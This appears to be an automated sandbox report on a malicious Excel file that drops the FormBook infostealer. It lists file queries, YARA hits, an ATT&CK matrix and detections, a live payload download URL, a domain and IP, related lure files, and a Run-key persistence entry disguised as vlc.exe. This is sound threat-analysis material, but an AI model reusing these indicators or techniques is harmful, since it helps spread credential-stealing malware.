          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation 111 | Registry Run Keys / Startup Folder 11 | Process Injection 412 | Disable or Modify Tools 11 | Credential API Hooking 1 | File and Directory Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scripting 2 | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 11 | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | System Information Discovery 124 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution 3 | Logon Script (Windows) | Logon Script (Windows) | Scripting 2 | Security Account Manager | Security Software Discovery 241 | SMB/Windows Admin Shares | Input Capture 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | PowerShell 3 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 31 | NTDS | Virtualization/Sandbox Evasion 5 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 22 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 3 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rootkit 1 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 111 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 5 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 412 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 323692, Sample: 5901777.xls, Startdate: 27/11/2020, Architecture: WINDOWS, Score: 100]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          5901777.xls | 24% | Virustotal |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\Public\oftmhayq.exe | 100% | Avira | HEUR/AGEN.1136389
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe | 100% | Avira | HEUR/AGEN.1136389
          C:\Users\Public\oftmhayq.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe | 100% | Joe Sandbox ML |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          29.0.oftmhayq.exe.870000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
          25.2.oftmhayq.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
          30.2.oftmhayq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          29.2.oftmhayq.exe.870000.1.unpack | 100% | Avira | HEUR/AGEN.1136389
          32.2.vlc.exe.70000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
          30.0.oftmhayq.exe.8a0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
          29.2.oftmhayq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          25.0.oftmhayq.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
          24.0.oftmhayq.exe.7c0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
          30.2.oftmhayq.exe.8a0000.1.unpack | 100% | Avira | HEUR/AGEN.1136389
          24.2.oftmhayq.exe.7c0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
          32.0.vlc.exe.70000.0.unpack | 100% | Avira | HEUR/AGEN.1136389

          Domains

          Source | Detection | Scanner | Label
          sparepartiran.com | 11% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          sparepartiran.com | 162.223.88.131 | true | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://sparepartiran.com/js/2Q/5901777.pdf.exe | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries


                                              Contacted IPs


                                              Public

                                              IP | Domain | Country | ASN | ASN Name | Malicious
                                              162.223.88.131 | unknown | United States | 19084 | COLOUPUS | true

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:323692
                                              Start date:27.11.2020
                                              Start time:11:35:45
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 13m 38s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:5901777.xls
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Run name:Potential for more IOCs and behavior
                                              Number of analysed new started processes analysed:33
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winXLS@16/12@2/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 3.9% (good quality ratio 3.8%)
                                              • Quality average: 78.1%
                                              • Quality standard deviation: 26%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 233
                                              • Number of non-executed functions: 200
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xls
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.147.198.201, 52.109.76.68, 52.109.8.24, 51.11.168.160, 104.42.151.234, 95.101.184.67, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              Time | Type | Description
                                              11:38:01 | API Interceptor | 367x Sleep call for process: splwow64.exe modified
                                              11:38:06 | API Interceptor | 77x Sleep call for process: powershell.exe modified
                                              11:38:30 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"
                                              11:38:39 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"

                                              Joe Sandbox View / Context

                                              IPs

                                              Match | Associated Sample Name / URL | Detection | Context
                                              162.223.88.131 | Hm0L8.xls | malicious | sparepartiran.com/js/2Q/Mvyfnzkjh1.exe
                                              162.223.88.131 | 5080132.xls | malicious | sparepartiran.com/js/1Q/Lfswmnuywzkn9.exe
                                              162.223.88.131 | Ref 0047.xls | malicious | sparepartiran.com/js/2Q/Yvvtz1.exe
                                              162.223.88.131 | 633307.xls | malicious | sparepartiran.com/js/2Q/Wzdgpx2.exe
                                              162.223.88.131 | SecuriteInfo.com.Exploit.Siggen3.1570.13842.xls | malicious | sparepartiran.com/js/2Q/Twvaedwzfyck1.exe
                                              162.223.88.131 | 4640578.xls | malicious | sparepartiran.com/js/2Q/Bolgkwpzwqs8.exe
                                              162.223.88.131 | 6021557.xls | malicious | sparepartiran.com/js/d1/8YAOuE8zfTpo1M9.exe
                                              162.223.88.131 | INQUIRY ON PRICE LIST.xlsm | malicious | sparepartiran.com/js/d1/IT4l74TKgSA7p92.exe
                                              162.223.88.131 | ORDER-45103.xls | malicious | sparepartiran.com/js/d1/SDJ-0488.exe
                                              162.223.88.131 | yp7kw0211047.xls | malicious | sparepartiran.com/js/d1/411.exe
                                              162.223.88.131 | Debt Statement.xls | malicious | sparepartiran.com/js/s0/11056.jpg
                                              162.223.88.131 | SD-1061.xls | malicious | sparepartiran.com/js/s0/SD-1061.jpg
                                              162.223.88.131 | NEW ORDER.xls | malicious | sparepartiran.com/js/s0/zz1ecco.jpg

                                              Domains

                                              Match | Associated Sample Name / URL | Detection | Context
                                              sparepartiran.com | Hm0L8.xls | malicious | 162.223.88.131
                                              sparepartiran.com | 5080132.xls | malicious | 162.223.88.131
                                              sparepartiran.com | Ref 0047.xls | malicious | 162.223.88.131
